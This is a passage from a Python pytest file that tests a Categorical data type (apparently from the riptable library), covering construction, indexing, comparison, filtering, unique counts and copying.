assert match_fa
assert len(result) == 3
assert len(result._categories_wrap) == 3
def test_categorical_compare_check(self):
self._notimpl()
# Categories have different modes
# categories are both enum
# compare cat to empty list
# non-categorical input
# convert all to unicode if one is unicode
# this keyword wasn't used anywhere, removed from copy()
# def test_copy_invalid(self):
# c = Categorical(['a','a','b','a','c','c','b'])
# invalid_copy = c.copy(fill_invalid=True)
# all_invalid = bool(np.all(invalid_copy.view(FastArray)==-128))
# self.assertTrue(all_invalid)
# for idx, item in enumerate(c.categories()):
# self.assertEqual(item, invalid_copy.categories()[idx])
# self.assertFalse(c.categories() is invalid_copy.categories())
def test_fill_invalid(self):
values = list('aabaccb')
c = Categorical(values, base_index=1)
c.fill_invalid(inplace=True)
assert_array_equal(FastArray([c.filtered_name] * len(values)), c.expand_array)
assert_array_equal(FastArray([0] * len(values)), c._fa)
expected = FastArray(sorted(set(values))).astype('|S1')
assert_array_equal(expected, c.category_array)
assert_array_equal(expected, c.category_dict[next(iter(c.category_dict))]) # values of first key
def test_force_unicode(self):
c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b'], unicode=True)
result_dtype = c.categories().dtype.char
assert result_dtype == 'U', f"Failed to force unicode when constructing categorical from list of string values"
def test_categories_shallow_copy(self):
codes = [10, 10, 20, 10, 30, 20, 10]
d = {10: 'a', 20: 'b', 30: 'c'}
c = Categorical(codes, d)
original_cats = c._categories_wrap
new_cats = original_cats.copy(deep=False)
assert (
original_cats._str_to_int_dict is new_cats._str_to_int_dict
), f"Categories did not use same str_to_int dictionary after shallow copy."
assert (
original_cats._int_to_str_dict is new_cats._int_to_str_dict
), f"Categories did not use same int_to_str dictionary after shallow copy."
# 5/16/2019 invalid category must be in user provided
# def test_two_lists_invalid(self):
# c = Categorical(['a','a','b','a','c','c','b'],np.array(['a','b']), invalid='inv', base_index=1)
# self.assertEqual(c[4],FILTERED_LONG_NAME)
@pytest.mark.xfail(
reason='20200416 This test was previously overridden by a later test in the file with the same name. Need to revisit and get back in a working state.'
)
def test_getitem_enum_list(self):
c = Categorical([44, 133, 133, 75, 144, 1], LikertDecision)
with pytest.raises(IndexError):
result = c[[b'NeitherAgreeNorDisagree']]
correct = FastArray([False, False, False, False, True, False])
# self.assertTrue(array_equal(result, correct))
result = c[[4]]
assert result[0] == 'NeitherAgreeNorDisagree'
def test_non_unique(self):
with pytest.raises(ValueError):
c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b'], ['a', 'a', 'b'])
def test_match_to_category(self):
c = Categorical(['a', 'a', 'b', 'a', 'c', 'c', 'b'])
result = c._categories_wrap.match_str_to_category('a')
assert b'a' == result
with pytest.raises(TypeError):
result = c._categories_wrap.match_str_to_category([1, 2, 3])
with pytest.raises(TypeError):
result = c._categories_wrap.match_str_to_category({1, 2, 3})
c1 = Categorical(['abc', 'def', 'abc', 'abc'], np.array(['abc', 'def']), unicode=True)
result = c1._categories_wrap.match_str_to_category([b'a'])
assert result.dtype.char == 'U'
# ------------------------------------TEST SET ITEM------------------------------------------
def test_set_item_str_index(self):
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
correct = [2, 2, 2, 2, 2, 2]
c['a'] = 'b'
is_correct = bool(np.all(c.view(FastArray) == correct))
assert is_correct, f"Category was not correctly changed with set item on a string."
with pytest.raises(ValueError):
c['b'] = 'c'
def test_set_item_int_index(self):
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
correct = [1, 2, 2, 1, 2, 2]
c[0] = 'a'
is_correct = bool(np.all(c.view(FastArray) == correct))
assert is_correct, f"Category was not correctly changed with set item on an int."
with pytest.raises(ValueError):
c[0] = 'c'
# ------------------------------------TEST CALCULATE DTYPE ----------------------------------
def test_get_dtype_from_len(self):
'''
Categorical will select different types
'''
dtype_sizes = {
np.int8: 1,
np.int16: 101,
np.int32: 50001,
} # , np.int64:2000000001 }
for dt, sz in dtype_sizes.items():
LENGTH = 6
NO_CODES = sz
alphabet = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
np_alphabet = np.array(alphabet, dtype="|U1")
np_codes = np.random.choice(np_alphabet, [NO_CODES, LENGTH])
codes = ["".join(np_codes[i]) for i in range(len(np_codes))]
c = Categorical(["".join(np_codes[i]) for i in range(len(np_codes))])
# only perform the test if there are enough uniques
if len(c._categories_wrap._list) >= sz:
assert c.dtype == dt, f"Categorical did not set dtype to {dt} for array of size {sz}."
# -------SINGLE INTEGER
def test_getitem_int(self):
'''
Single integer index should return the corresponding category in unicode format.
'''
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
assert c[0] == 'b', f"Get item with integer did not return the correct category."
assert isinstance(c[0], str), f"Get item with integer did not return as unicode."
assert c[3] == 'a', f"Get item with integer did not return the correct category."
assert isinstance(c[3], str), f"Get item with integer did not return as unicode."
with pytest.raises(IndexError):
d = c[10]
# --------INTEGER MASK
def test_getitem_int_mask(self):
py_mask = [0, 3]
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
for mask in [py_mask, np.array(py_mask)]:
d = c[mask]
assert isinstance(
d, Categorical
), f"Get item with integer mask did not return a categorical. Returned {type(d).__name__} instead."
assert len(d) == len(
mask
), f"Get item with integer mask did not return categorical of {len(mask)}. returned {len(d)} instead."
has_same_cats = bool(np.all(d._categories_wrap._list == c._categories_wrap._list))
assert (
has_same_cats
), f"Failed to copy the same categories to new categorical after getitem with integer mask."
d = c[[0, 10]]
assert d._fa[1] == 0, f"Failed to put invalid for out of range index."
# -------BOOLEAN MASK
def test_getitem_bool_mask(self):
py_mask = [True, True, True, False, True, True]
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
for mask in [py_mask, np.array(py_mask)]:
d = c[mask]
assert not (
b'a' in d.as_string_array
), f"b'a' does not get trimmed out of categorical with getitem from boolean array."
assert 5 == len(
d
), f"Length {len(d)} did not match 5 in categorical getitem with a boolean array of the same size."
has_same_cats = bool(np.all(d._categories_wrap._list == c._categories_wrap._list))
assert (
has_same_cats
), f"Failed to copy the same categories to new categorical after getitem with integer mask."
# -------SINGLE STRING
def test_getitem_single_string(self):
b_result = [True, True, True, False, True, True]
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
idx = b'c'
# with self.assertRaises(IndexError):
d = c[idx]
has_true = bool(np.any(d))
assert not has_true, f"Failed to return an array of all false for getitem with {idx}"
assert isinstance(d, FastArray), f"Get item input {idx} did not return FastArray"
assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray"
idx = idx.decode()
# with self.assertRaises(IndexError):
d = c[idx]
has_true = bool(np.any(d))
assert not has_true, f"Failed to return an array of all false for getitem with {idx}"
assert isinstance(d, FastArray), f"Get item input {idx} did not return FastArray"
assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray"
idx = b'b'
# with self.assertRaises(IndexError):
d = c[idx]
is_correct = bool(np.all(d == b_result))
assert is_correct, f"Did not return the correct array for getitem with {idx}"
assert isinstance(d, FastArray), f"Get item input {idx} did not return FastArray"
assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray"
idx = idx.decode()
# with self.assertRaises(IndexError):
d = c[idx]
is_correct = bool(np.all(d == b_result))
assert is_correct, f"Did not return the correct array for getitem with {idx}"
assert isinstance(d, FastArray), f"Get item input {idx} did not return FastArray"
assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray"
# ------MULTIPLE STRINGS
def test_getitem_multiple_strings(self):
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'])
inputs = {
(b'b',): [True, True, True, False, True, True], # single in (list)
(b'c',): [False, False, False, False, False, False], # single not in (list)
(b'a', b'b'): [True, True, True, True, True, True], # both in (list)
(b'c', b'd'): [False, False, False, False, False, False,], # both not in (list)
(b'b', b'c'): [True, True, True, False, True, True], # mixed (list)
}
for idx, correct in inputs.items():
idx = list(idx)
d = c[idx]
is_correct = bool(np.all(d == correct))
assert is_correct, f"Indexing categorical {c} by {idx} did not return the correct result."
assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray"
idx = [b.decode() for b in idx]
d = c[idx]
is_correct = bool(np.all(d == correct))
assert is_correct, f"Indexing categorical {c} by {idx} did not return the correct result."
assert d.dtype.char == '?', f"Get item input {idx} did not return FastArray"
# ------NUMERIC GETITEM
def test_getitem_numeric_categories(self):
# before it was fixed, a bug was returning a string of the numeric category
nums = np.array([1, 1, 2, 3, 4, 5, 1, 1, 1])
c = Categorical(nums)
assert c[0] == 1
assert isinstance(c[0], (int, np.integer))
nums = nums.astype(np.float32)
c = Categorical(nums)
assert c[0] == 1.0
assert isinstance(c[0], (float, np.floating)), f"Expected float, got {type(c[0])}"
# ------------------------- TEST COMPARE CHECK -------------------------------------------
def test_compare_check(self):
'''
Test comparison between two 'equal' categoricals with different underlying arrays.
'''
compare_ops = {
'__ne__': [False, False, False, False, False, False],
'__eq__': [True, True, True, True, True, True],
'__ge__': [True, True, True, True, True, True],
'__gt__': [False, False, False, False, False, False],
'__le__': [True, True, True, True, True, True],
'__lt__': [False, False, False, False, False, False],
}
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b', 'c'])
d = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
for name, correct in compare_ops.items():
func = c.__getattribute__(name)
result = func(d)
is_correct = bool(np.all(result == correct))
assert is_correct, f"Compare operation betweeen two equal categoricals did not return the correct result."
def test_compare_return_type(self):
'''
Test comparison operations with single strings to make sure FastArray of boolean is returned.
'''
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
scalars = ['a', 'c']
compare_ops = ['__ne__', '__eq__', '__ge__', '__gt__', '__le__', '__lt__']
for s in scalars:
for op in compare_ops:
func = c.__getattribute__(op)
result = func(s)
assert isinstance(result, FastArray), f"comparison {op} with input {s} did not return FastArray"
assert result.dtype.char == '?', f"comparison {op} with input {s} did not return boolean"
def test_compare_different_modes(self):
c1 = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
c2 = Categorical([0, 1], {0: 'a', 1: 'b'})
with pytest.raises(TypeError):
c1 == c2
def test_compare_conflicting_dicts(self):
c1 = Categorical([0, 1], {0: 'a', 1: 'b'})
c2 = Categorical([0, 1], {1: 'a', 0: 'b'})
with pytest.raises(ValueError):
c1 == c2
def test_compare_safe_dicts(self):
c1 = Categorical([0, 1], {0: 'a', 1: 'b'})
c2 = Categorical([2, 1], {2: 'c', 1: 'b'})
correct = FastArray([False, True])
result = c1 == c2
match = bool(np.all(correct == result))
assert match
def test_isnan(self):
c = Categorical([1, 1, 3, 2, 2], ['a', 'b', 'c'], base_index=1, invalid='a')
is_correct = [True, True, False, False, False]
is_not_correct = [False, False, True, True, True]
assert bool(np.all(is_correct == isnan(c)))
assert bool(np.all(is_correct == c.isnan()))
assert bool(np.all(is_not_correct == isnotnan(c)))
assert bool(np.all(is_not_correct == c.isnotnan()))
# ------------------------------------------------------
def test_get_categories(self):
# string list
c = Categorical(['a', 'b', 'c', 'd', 'e'])
catsarray = c.category_array
assert isinstance(catsarray, np.ndarray)
catsdict = c.category_dict
assert isinstance(catsdict, dict)
assert len(catsdict) == 1
with pytest.raises(TypeError):
catscodes = c.category_codes
with pytest.raises(TypeError):
catsmapping = c.category_mapping
# numeric list
c = Categorical(np.array([1, 2, 3, 4, 5]))
catsarray = c.category_array
assert isinstance(catsarray, np.ndarray)
catsdict = c.category_dict
assert isinstance(catsdict, dict)
assert len(catsdict) == 1
with pytest.raises(TypeError):
catscodes = c.category_codes
with pytest.raises(TypeError):
catsmapping = c.category_mapping
# dict/enum
c = Categorical([1, 2, 3, 4], {1: 'a', 2: 'b', 3: 'c', 4: 'd'})
catsarray = c.category_array
assert isinstance(catsarray, np.ndarray)
catsdict = c.category_dict
assert isinstance(catsdict, dict)
assert len(catsdict) == 1
catscodes = c.category_codes
assert isinstance(catscodes, np.ndarray)
catsmapping = c.category_mapping
assert isinstance(catsmapping, dict)
# multikey
c = Categorical([np.arange(5), np.random.rand(5)])
with pytest.raises(TypeError):
catsarray = c.category_array
catsdict = c.category_dict
assert isinstance(catsdict, dict)
assert len(catsdict), 2
with pytest.raises(TypeError):
catscodes = c.category_codes
with pytest.raises(TypeError):
catsmapping = c.category_mapping
# ------------------------------------------------------
def test_force_base_index2(self):
c = Categorical(['a', 'a', 'b', 'c', 'a'])
assert c.base_index == 1
assert c._fa[0] == 1
c = Categorical(['a', 'a', 'b', 'c', 'a'], base_index=0)
assert c.base_index == 0
assert c._fa[0] == 0
codes = np.array([0, 0, 1, 2, 0])
cats = np.array(['a', 'b', 'c'])
# c = Categorical(codes, cats)
# self.assertEqual(c.base_index, 0)
# self.assertEqual(c._fa[0], 0)
codes += 1
c = Categorical(codes, cats, base_index=1)
assert c.base_index == 1
assert c._fa[0] == 1
codes = codes.astype(np.float32)
c = Categorical(codes, cats, from_matlab=True)
assert c.base_index == 1
assert c._fa[0] == 1
with pytest.raises(ValueError):
c = Categorical(codes, cats, from_matlab=True, base_index=0)
c = Categorical(np.array(['a', 'a', 'b', 'c', 'a']), np.array(['a', 'b', 'c']))
assert c.base_index == 1
assert c._fa[0] == 1
c = Categorical(np.array(['a', 'a', 'b', 'c', 'a']), np.array(['a', 'b', 'c']), base_index=0)
assert c.base_index == 0
assert c._fa[0] == 0
# ------------------------------------------------------
def test_ordered(self):
c = Categorical(['c', 'c', 'a', 'b', 'c'])
cats = c.category_array
assert cats[0] == b'a'
c = Categorical(['c', 'c', 'a', 'b', 'c'], ordered=False)
cats = c.category_array
assert cats[0] == b'c'
c = Categorical(['c', 'c', 'a', 'b', 'c'], ['c', 'a', 'b'])
cats = c.category_array
assert cats[0] == b'c'
assert not c.ordered
c = Categorical(['c', 'c', 'a', 'b', 'c'], ['a', 'b', 'c'])
assert c.ordered
## removed this test - side-effect of search sorted with unsorted array (not categorical related)
## false claim that categories are ordered in keyword
# c = Categorical(['c','c','a','c','c'], ['c','a','b'], ordered=True)
# self.assertTrue(bool(np.all(c!='c')))
# self.assertTrue(bool(np.all(c!=b'c')))
c = Categorical(['c', 'c', 'a', 'b', 'c'], ['c', 'a', 'b'], ordered=False)
cats = c.category_array
assert cats[0] == b'c'
assert not c.ordered
codes = FastArray([0, 0, 1, 2, 0])
cats = FastArray(['c', 'b', 'a'], unicode=True)
c = Categorical(codes, cats)
assert c.category_array[0] == 'c'
assert not c.ordered
# with self.assertWarns(UserWarning):
# c = Categorical(codes, cats, ordered=True)
# self.assertEqual(c.category_array[0], b'c')
# self.assertFalse(c.ordered)
# ------------------------------------------------------
def test_keywords_not_allowed(self):
# filter + base index 0
f = np.array([True, False, True])
with pytest.raises(ValueError):
c = Categorical(['a', 'b', 'c'], filter=f, base_index=0)
# ------------------------------------------------------
def test_display_properties(self):
'''
Categoricals take over their display properties to appear like strings (not the underlying integer array)
(see Utils.rt_display_properties)
'''
c = Categorical(['b', 'b', 'b', 'a', 'b', 'b'], ['a', 'b'])
item_format, convert_func = c.display_query_properties()
assert item_format.length == DisplayLength.Long, f"Incorrect length for item format."
assert item_format.justification == DisplayJustification.Left
assert item_format.invalid == None
assert item_format.can_have_spaces == True
assert item_format.decoration == None
assert item_format.color == DisplayColumnColors.Default
assert convert_func.__name__ == 'display_convert_func'
# this could change, right now the convert function just does a str over the item
assert convert_func(1, item_format) == '1', f"Incorrect convert function was returned."
# ------------------------------------------------------
# -----MISC. COVER TESTS--------------------------------
def test_non_array_dict_categories_ctor(self):
with pytest.raises(TypeError):
c = Categories(['garbage', 'list'])
def test_too_many_args_categories_ctor(self):
with pytest.raises(ValueError):
c = Categories(FastArray([1]), FastArray([2]), FastArray([3]))
def test_filter_and_invalid(self):
c = Categorical(
['a', 'a', 'b', 'c', 'c'], ['c'], invalid='a', filter=FastArray([True, True, False, True, True]),
)
c.filtered_set_name('a')
assert bool(np.all(c._fa == [0, 0, 0, 1, 1]))
for i in range(3):
assert c[i] == 'a'
for i in range(3, 5):
assert c[i] == 'c'
def test_zero_base_with_invalid(self):
with pytest.raises(ValueError):
c = Categorical(['a', 'b', 'c'], ['b', 'c'], base_index=0)
# removed this property from Categories 04/24/2019
# def test_multikey_labels(self):
# c = Categorical([FastArray(['a','b','c']), FastArray([1,2,3])])
# labels = c._categories_wrap.multikey_labels
# self.assertTrue(isinstance(labels[0], tuple))
# self.assertEqual(labels[0][0],'a')
def test_ncols_non_multikey(self):
c = Categorical(['a', 'b', 'c'])
assert c._categories_wrap.ncols == 1
# now checks for single / multikey / enum, not CategoryMode
# def test_len_undefined_mode(self):
# c = Categorical(['a','b','c'])
# c._categories_wrap._mode = CategoryMode.Default
# self.assertEqual(len(c._categories_wrap),0)
def test_categories_copy_shallow(self):
c = Categorical(['a', 'b', 'c'])
copycat = c._categories_wrap.copy(deep=False)
assert isinstance(copycat, Categories)
def test_categories_copy_deep(self):
c = Categorical([1, 2, 3], {1: 'a', 2: 'b', 3: 'c'})
copycat = c._categories_wrap.copy(deep=False)
assert isinstance(copycat, Categories)
# impossible path, unless mode is forced like below. disabling 4/24/2019
# c._categories_wrap._mode = CategoryMode.Default
# with self.assertRaises(NotImplementedError):
# c = c._categories_wrap.copy()
def test_wrap_get_categories(self):
c = Categorical(['a', 'b', 'c'])
arr = c._categories_wrap.get_categories()
assert isinstance(arr, FastArray)
c = Categorical([FastArray(['a', 'b', 'c']), FastArray([1, 2, 3])])
d = c._categories_wrap.get_categories()
assert isinstance(d, dict)
def test_get_string_mode_nums(self):
c = Categorical(np.arange(5))
assert not c._categories_wrap.isbytes
assert not c._categories_wrap.isunicode
def test_pop_single_arr(self):
c = Categorical([np.array(['a', 'b', 'c'])])
d = Categorical(np.array(['a', 'b', 'c']))
assert bool(np.all(c == d))
c = Categorical({'test': np.array(['a', 'b', 'c'])})
d = Categorical(np.array(['a', 'b', 'c']))
assert bool(np.all(c == d))
def test_from_cat_as_array(self):
c = Categorical(FastArray([1, 2, 3]), _from_categorical=np.array(['a', 'b', 'c']))
assert isinstance(c.category_array, FastArray)
assert c.base_index == 1
def test_from_pandas_object(self):
pdc = pd.Categorical(['a', 'b', 'c'])
c = Categorical(pdc, unicode=True)
assert c.category_array.dtype.char == 'U'
c = Categorical(pdc, unicode=False)
assert c.category_array.dtype.char == 'S'
pdc = pd.Categorical(three_unicode)
c = Categorical(pdc)
assert c.category_array.dtype.char == 'U'
def test_empty_init(self):
with pytest.raises(ValueError):
c = Categorical({})
with pytest.raises(ValueError):
c = Categorical([])
def test_multi_with_cats(self):
with pytest.raises(NotImplementedError):
c = Categorical(
[FastArray(['a', 'b', 'c', 'a']), FastArray([1, 2, 3, 1])],
[FastArray(['a', 'b', 'c']), FastArray([1, 2, 3])],
)
# 5/9/2019 removed this warning to reduce constructor paths
# def test_unicode_warn(self):
# with self.assertWarns(UserWarning):
# c = Categorical([1,2,3],{1:'a',2:'b',3:'c'}, unicode=False)
def test_map_non_integer(self):
with pytest.raises(TypeError):
c = Categorical([1.0, 2.0, 3.0], {1: 'a', 2: 'b', 3: 'c'})
def test_category_multi_arrays(self):
with pytest.raises(TypeError):
c = Categorical([1, 2, 3], [np.arange(5), np.arange(5)])
def test_getitem_enum_list2(self):
c = Categorical([1, 1, 2, 3, 1], {'a': 1, 'b': 2, 'c': 3})
d = c[[1, 2, 3]]
assert d[0] == 'a'
def test_tuple_compare_error(self):
c = Categorical([FastArray(['a', 'b', 'c', 'a']), FastArray([1, 2, 3, 1])])
with pytest.raises(ValueError):
_ = c == ('a', 'b', 'c')
def test_filter_out_bytes_from_unicode(self):
c = Categorical(['a', 'a', 'b', 'c', 'a'], unicode=True, invalid=b'a')
assert bool(np.all(c._fa == [1, 1, 2, 3, 1]))
assert c.category_array.dtype.char == 'U'
assert 'a' in c.category_array
def test_bytes_compare_multikey(self):
c = Categorical([np.array(['a', 'b', 'c', 'a']), FastArray([1, 2, 3, 1])], unicode=True)
cols = c.category_dict
bytescol = list(cols.values())[0]
assert bytescol.dtype.char == 'U'
result = c == (b'a', 1)
assert bool(np.all(FastArray([True, False, False, True]) == result))
def test_cat_zero_wronge_base(self):
with pytest.raises(ValueError):
c = CatZero(['a', 'a', 'b', 'c', 'a'], base_index=1)
def test_preserve_name(self):
ds = TypeRegister.Dataset({'strcol': np.random.choice(['a', 'b', 'c'], 10), 'numcol': arange(10)})
c = Categorical(ds.strcol)
assert c.get_name() == 'strcol'
c = Categorical([ds.strcol, ds.numcol])
ds2 = c.sum(arange(10))
labels = ds2.label_get_names()
assert labels[0] == 'strcol'
assert labels[1] == 'numcol'
ds = TypeRegister.Dataset({'mycodes': np.random.randint(1, 4, 10)})
c = Categorical(ds.mycodes, {'a': 1, 'b': 2, 'c': 3})
assert c.get_name() == 'mycodes'
codes = np.random.randint(1, 4, 10)
cats = FastArray(['a', 'b', 'c'])
cats.set_name('test')
c = Categorical(codes, cats)
assert c.get_name(), 'test'
def test_subarray_name(self):
c = Categorical(['a', 'b'])
c1 = c[[0]]
assert c1.get_name() == c.get_name()
# Make sure there is no "quantum effect" that printing the array changes it's name.
_ = str(c1)
assert c1.get_name() == c.get_name()
def test_construct_from_categorical(self):
c = Categorical(['a', 'a', 'b', 'c', 'a'])
d = Categorical(c)
assert isinstance(d.category_array, np.ndarray)
assert isinstance(d.expand_array, np.ndarray)
d2 = Categorical([c])
assert isinstance(d2.category_array, np.ndarray)
assert isinstance(d2.expand_array, np.ndarray)
def test_total_size(self):
c = Categorical(['a', 'a', 'b', 'c', 'a'])
assert c._total_size == 8
c = Categorical([arange(5, dtype=np.int32), arange(5, dtype=np.int32)])
assert c._total_size == 45
c = Categorical([arange(5, dtype=np.int64), arange(5, dtype=np.int64)])
assert c._total_size == 85
# removed while modifying groupby calculation behavior
# def test_hold_dataset(self):
# ds = TypeRegister.Dataset({'strcol':np.random.choice(['a','b','c'],30), 'numcol':arange(30)})
# c = ds.cat('strcol')
# self.assertTrue(isinstance(c._dataset, TypeRegister.Dataset))
# result = c.sum()
# self.assertTrue(isinstance(result, TypeRegister.Dataset))
# self.assertEqual(result._nrows, 3)
def test_expand_dict(self):
og_strings = FastArray(['a', 'a', 'b', 'c', 'a'])
og_nums = arange(5)
c = Categorical([og_strings, og_nums])
d = c.expand_dict
assert isinstance(d, dict)
assert len(d) == 2
dictlist = list(d.values())
assert bool(np.all(dictlist[0] == og_strings))
assert bool(np.all(dictlist[1] == og_nums))
c = Categorical([1, 2, 3], {'a': 1, 'b': 2, 'c': 3})
d = c.expand_dict
assert isinstance(d, dict)
assert len(d) == 1
dictlist = list(d.values())
assert bool(np.all(dictlist[0] == arange(1, 4)))
c = Categorical(np.random.randint(0, 10, 100_100))
with pytest.warns(UserWarning):
d = c.expand_dict
def test_expand_array(self):
c = Categorical([1, 2, 3], {'a': 1, 'b': 2, 'c': 3})
arr = c.expand_array
assert bool(np.all(arr == arange(1, 4)))
c = Categorical([FastArray(['a', 'b', 'c', 'a']), FastArray([1, 2, 3, 1])])
# expand array now works on multikey categoricals, returns a tuple of expanded arrays SJK: 4/29/2019
multi_expand = c.expand_array
assert isinstance(multi_expand, tuple)
assert len(multi_expand) == 2
assert bool(np.all(FastArray(['a', 'b', 'c', 'a']) == multi_expand[0]))
assert bool(np.all(FastArray([1, 2, 3, 1]) == multi_expand[1]))
c._fa[:] = 0
multi_expand = c.expand_array
assert bool(np.all(isnan(multi_expand[1])))
assert bool(np.all(multi_expand[0] == b'Filtered'))
def test_true_false_spacer(self):
c = Categorical(['a', 'b', 'c'])
t_true = c._tf_spacer(['test', True])
assert t_true == 'testTrue '
t_false = c._tf_spacer(['test', False])
assert t_false == 'testFalse'
def test_mapping_hstack(self):
c1 = Categorical([1, 1, 1, 1, 2, 3], {'a': 1, 'b': 2, 'c': 3})
c2 = Categorical([1, 1, 1, 1, 3, 4], {'a': 1, 'c': 3, 'd': 4})
stacked = Categorical.hstack([c1, c2])
assert stacked.unique_count == 4
assert stacked.from_category('b') == 2
assert stacked.from_category('d') == 4
assert len(stacked) == 12
c1 = Categorical([1, 1, 1, 1, 2, 3], {'a': 1, 'b': 2, 'd': 3})
c2 = Categorical([1, 1, 1, 1, 3, 4], {'a': 1, 'c': 3, 'd': 4})
# removed, hstack now relies on unique codes only SJK: 3/5/2019
# with self.assertRaises(TypeError):
# c3 = Categorical.hstack([c1, c2])
def test_matlab_nan(self):
dts = [np.int8, np.int16, np.int32, np.int64]
matlab_float_idx = FastArray([1.0, 0.0, np.nan])
matlab_cats = ['a', 'b']
for dt in dts:
c = Categorical(matlab_float_idx, matlab_cats, dtype=dt, from_matlab=True)
assert bool(np.all(c._fa == [1, 0, 0])), f'failed to flip nan to zero for dtype {dt}'
assert np.dtype(dt) == c.dtype
def test_from_provided_with_filter(self):
# not found and filter
c = Categorical(
['a', 'a', 'b', 'c', 'd'],
['a', 'b', 'c'],
filter=FastArray([False, False, True, True, False]),
invalid='INVALID',
)
c.filtered_set_name('INVALID')
correct = FastArray([b'INVALID', b'INVALID', b'b', b'c', b'INVALID'])
assert bool(np.all(c.expand_array == correct))
# filter only (uses default invalid)
c = Categorical(['a', 'a', 'b', 'c'], ['a', 'b', 'c'], filter=FastArray([False, False, True, True]),)
f = c.filtered_name
correct = FastArray([f, f, b'b', b'c'])
assert bool(np.all(c.expand_array == correct))
# even though filtered out, categories still untouched
correct = FastArray([b'a', b'b', b'c'])
assert bool(np.all(c.category_array == correct))
# filtering not allowed for base index 0
with pytest.raises(ValueError):
c = Categorical(
['a', 'a', 'b', 'c'], ['a', 'b', 'c'], filter=FastArray([False, False, True, True]), base_index=0,
)
def test_numeric_invalid(self):
# 5/16/2019 invalid category must be in provided uniques
c = Categorical([1.0, 1.0, 2.0], [1.0, 2.0], invalid=2.0)
assert c._fa[2] == 2
num = c.sum(arange(1, 4)).col_0[0]
assert num == 3
def test_get_groupings(self):
g, f, n = (
FastArray([2, 3, 0, 4, 1]),
FastArray([0, 0, 2, 4]),
FastArray([0, 2, 2, 1]),
)
c = Categorical(['b', 'c', 'a', 'a', 'b'], base_index=0)
gg = c.get_groupings()
group = gg['iGroup']
first = gg['iFirstGroup']
ncount = gg['nCountGroup']
assert bool(np.all(g == group))
assert bool(np.all(f == first))
assert bool(np.all(n == ncount))
c = Categorical(['b', 'c', 'a', 'a', 'b'], base_index=1)
gg = c.get_groupings()
group = gg['iGroup']
first = gg['iFirstGroup']
ncount = gg['nCountGroup']
assert bool(np.all(g == group))
assert bool(np.all(f == first))
assert bool(np.all(n == ncount))
def test_repr(self):
# just make sure no error for coverage
c = Categorical(['a', 'b', 'c'])
r = c.__repr__()
assert r, f"Representation should not be empty for Categorical '{c}'."
assert isinstance(r, str)
def test_copy_deep(self):
c = Categorical(['a', 'b', 'c'])
d = c.copy(deep=True)
d[0] = 'b'
assert c[0] == 'a'
assert c._fa[0] == 1
assert d[0] == 'b'
assert d._fa[0] == 2
def test_copy_new_filter(self):
a = Categorical('A B A B A B'.split())
b = Categorical('B A B A B A'.split())
c = a.copy()
f = c == 'A'
c[f] = b[f]
assert c[0] == 'B'
assert c[1] == 'B'
assert a[0] == 'A'
assert a[1] == 'B'
assert b[0] == 'B'
assert b[1] == 'A'
def test_setitem_tuple(self):
c = Categorical([arange(5), arange(5)])
c[0] = (1, 1)
assert c._fa[0] == 2
def test_nunique(self):
codes = np.random.randint(0, 3, 1000)
d = {0: 'All', 1: 'ManualAndQuasi', 2: 'Manual'}
c = Categorical(codes, d)
n = c.nunique()
assert n == 3
assert len(c.unique()) == 3
codes = np.ones(1000, dtype=np.int32)
c = Categorical(codes, d)
n = c.nunique()
assert n == 1
assert len(c.unique()) == 1
codes = arange(5)
c = Categorical(codes, d)
n = c.nunique()
assert n == 5
assert len(c.unique()) == 5
c = Categorical(['a', 'a', 'b', 'c', 'd'], ['a', 'b', 'c', 'd'])
n = c.nunique()
assert n == 4
assert len(c.unique()) == 4
c = Categorical(['a', 'a', 'b', 'c', 'd'], ['a', 'b', 'c', 'd'], base_index=0)
n = c.nunique()
assert n == 4
assert len(c.unique()) == 4
c = Categorical(['a', 'a', 'b', 'c', 'd'])
c[2] = 0
n = c.nunique()
assert n == 3
assert len(c.unique()) == 3
assert c.unique_count == 4
c = Categorical([arange(3), np.array(['a', 'b', 'c'])])
c[0] = 0
n = c.nunique()
assert n == 2
assert c.unique_count == 3
# The following assertion is moved to it's own unit pytest along with an xfail.
# found below and named test_multikey_categorical_unique.
# assert len(c.unique()) == 2
def test_unique(self):
l = list('xyyz')
c, c_sub = rt.Cat(l), rt.Cat(l[:3])
assert_array_equal(c.unique(), c.category_array, 'mismatch between unique categories and category array')
assert_array_equal(c.unique(), c.category_array.unique(), 'mismatch between unique categories and expanded category array')
assert c.nunique() == 3, 'mismatch in number of unique categories'
assert_array_equal(c[:3].unique(), c_sub.category_array, 'mismatch between unique categories and category array with sliced categorical')
assert_array_equal(c[:3].unique(), c_sub.category_array.unique(), 'mismatch between unique categories and expanded category array with sliced categorical')
assert c[:3].nunique() == 2, 'mismatch in number of unique categories with sliced categorical'
def test_scalar_unique(self):
idx = ones(100)
cats = 700_000.0
c = Categorical(idx, cats, from_matlab=True)
assert isinstance(c, Categorical)
assert c.unique_count == 1
def test_stack_multikey(self):
# TODO pytest parameterize the strings
strs = FA(np.random.choice(['aaaaa', 'b', 'ccc'], 23))
flts = np.random.choice([7.14, 6.66, 5.03], 23)
c1 = Categorical([strs, flts])
c1_str = Categorical(strs)
c1_flt = Categorical(flts)
strs2 = FA(np.random.choice(['b', 'aaaaa'], 17))
flts2 = np.random.choice([5.03, 7.14], 17)
c2 = Categorical([strs2, flts2])
c2_str = Categorical(strs2)
